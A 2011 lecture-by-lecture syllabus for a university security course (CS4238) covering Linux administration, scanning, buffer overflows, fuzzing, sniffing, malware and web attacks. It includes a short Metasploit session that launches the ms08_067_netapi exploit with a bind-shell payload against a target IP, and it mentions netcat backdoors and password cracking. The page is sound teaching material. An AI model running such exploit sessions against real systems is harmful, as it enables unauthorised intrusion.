Summary of CS4238 Lectures
Lecture 1 (15/08/2011)
Lecture topic: Module Overview, and administrative information
Lecture 2 (22/08/2011)
Lecture topic: Linux overview and system administration
Skills and tools:
- Installation of Ubuntu Linux
- Understanding common Linux file system structure
- /etc, /etc/passwd,
/etc/shadow
- /bin, /sbin, /usr/bin,
/usr/sbin, /usr/local/bin
- /dev, /boot, /proc,
- /tmp, /var, /var/log
- Interface to the
on-line reference manuals:
man
- Example: man man, man
ls, man -k password, man 1 write, man 2 write
- Editor: vi, pico, gedit
- Process control: &,
ps, kill, fg, bg
- File system commands: ls,
cd, pwd, rm, mkdir, rmdir
- File system access control: chmod,
chown,
chgrp
- Understanding the UNIX access control string (rwxrwxrwx) and numerical
encoding
- Understanding special permissions, such as set-uid
- Example: chmod u+x
myfile, chmod 4755 myexecutable
Lecture 3 (29/08/2011)
Lecture topic: Reconnaissance and Scanning
Milestones: Form project team,
finish setting up Linux on the external USB drive
Skills and tools:
- Google Hacking, searching with directives and search operators
- Whois database: whois
- Example: whois nus.edu.sg
- DNS query: nslookup, dig
- Configure a network interface or find our system IP address: ifconfig
- Example: ifconfig,
ifconfig eth0, ifconfig eth0 192.168.0.125 netmask 255.255.255.0
- Network mapping: ping,
traceroute
- Example: ping
192.168.0.1, ping ivle.nus.edu.sg, traceroute www.google.com
- GUI-based network mapping tool: Cheops-ng
- Port scanning: nmap, zenmap
- Try all possible command line options of nmap
- Package maintenance: apt-get,
apt-cache
- Example, search for package nmap: apt-cache search nmap
- Installing and removing a package: sudo apt-get install nmap, sudo
apt-get remove nmap
- GUI-based package manager: sudo synaptic, or start from
system menu System->Administration->Synaptic Package Manager
Lecture 4 (05/09/2011)
Lecture topic: Vulnerability-scanning, buffer overflow exploits and
analysis
Skills and tools:
- Nessus vulnerability scanner: basic configuration and scanning
- GDB
- Breakpoints: break,
delete
- Set a breakpoint at function func: break func
- Set a breakpoint at a memory address addr: break *addr
- Set a breakpoint at a line number N of the current source file: break N
- Set a breakpoint at a line number N of the source file F: break F:N
- Delete a breakpoint: delete
- Executing program and stepping: run, step, stepi, next, nexti
- Start debugged program: run
- Execute one line in source code: step
- Execute one machine instruction: stepi
- Execute one line in source code. Do not step into functions: next
- Execute one machine instruction. Do not step into functions: nexti
- Examining the environment and program states:
Resources:
Lecture 5 (12/09/2011)
Lecture topic: Buffer overflow attacks, exploit engine, buffer overflow
defense, password attacks
Skills and tools:
- Using GDB to understand buffer overflow attacks and defense
mechanisms
- Creating exploits to get root shell
- Metasploit framework
- Start metasploit framework: msfconsole
- Subcommands: use,
set RHOST, set PAYLOAD, exploit
An sample session, texts in green are prompts from shell
and msfconsole:
$ msfconsole
msf > use
exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi)
> set RHOST 192.168.10.2
msf exploit(ms08_067_netapi)
> set PAYLOAD windows/shell_bind_tcp
msf exploit(ms08_067_netapi)
> exploit
- John the Ripper password cracker
Resources:
Lecture 6 (19/09/2011)
Lecture topic: Linux network administration and firewall
Skills and tools:
- Configuring network settings of a host computer
- IP address, network mask, gateway, and DNS
- Static configuration and DHCP
- Configuring network settings of a router
- Enabling IP forwarding in Linux
- The ifconfig utility
- Linux firewall
- The Netfilter framework: PREROUTING, FORWARD, POSTROUTING,
INPUT, OUTPUT
- Path of packets
- Firewall rules
- The iptables tool
- Sharing an IP address by network address translation (NAT)
- Creating a virtual network interface and connecting a QEMU
virtual machine to the virtual network interface
Resources:
Lecture 7 (26/09/2011)
Lecture topic: Fuzzing, vulnerability detection, binary analysis
Skills and tools:
- The SPIKE fuzzer
- Understanding SPIKE scripts
- Open-source package configuration
- Using GDB to analyze program crashes
- (Optional) BitBlaze platform
- Using BitBlaze's taint tracking utility to detect buffer
overflow exploits
Resources:
Lecture 8 (03/10/2011)
Lecture topic: Network attacks, sniffing, IP spoofing, session
hijacking, and denial-of-service
Skills and tools:
- Wireshark
- The netwox utility
- Packet spoofing, reset connection, session hijacking
- Netcat
- File transfer, port scanning, connecting to open ports,
vulnerability scanning, creating backdoors, and relaying traffic.
Resources:
Lecture 9 (10/10/2011)
Lecture topic: Malware analysis, trojan and backdoor, user-level
rootkit, kernel-level rootkit, botnets
Skills and tools:
- Analyzing program behavior through system call tracing
- Understanding the basic concept of rootkit mechanisms and
detection mechanisms
- (Optional) Virtual machine introspection using BitBlaze
Lecture 10 (17/10/2011)
Lecture topic: Web session cloning, CSRF attacks, SQL injection,
Cross-site scripting, Drive-by download.
Skills and tools:
- Configuring Apache server
- Intercepting and understanding web requests
- TamperData Firefox extension
- Paros Proxy
Resources:
Lecture 11 (24/10/2011)
Lecture topic: Guest lecture on web attacks.
Lecture 12 (31/10/2011)
Lecture topic: Review
Resources:
- Whole disk encryption
- eCryptfs: Enterprise Cryptographic Filesystem
Lecture 13 (8/11/2011, 9/11/2011)
Lecture topic: Practice session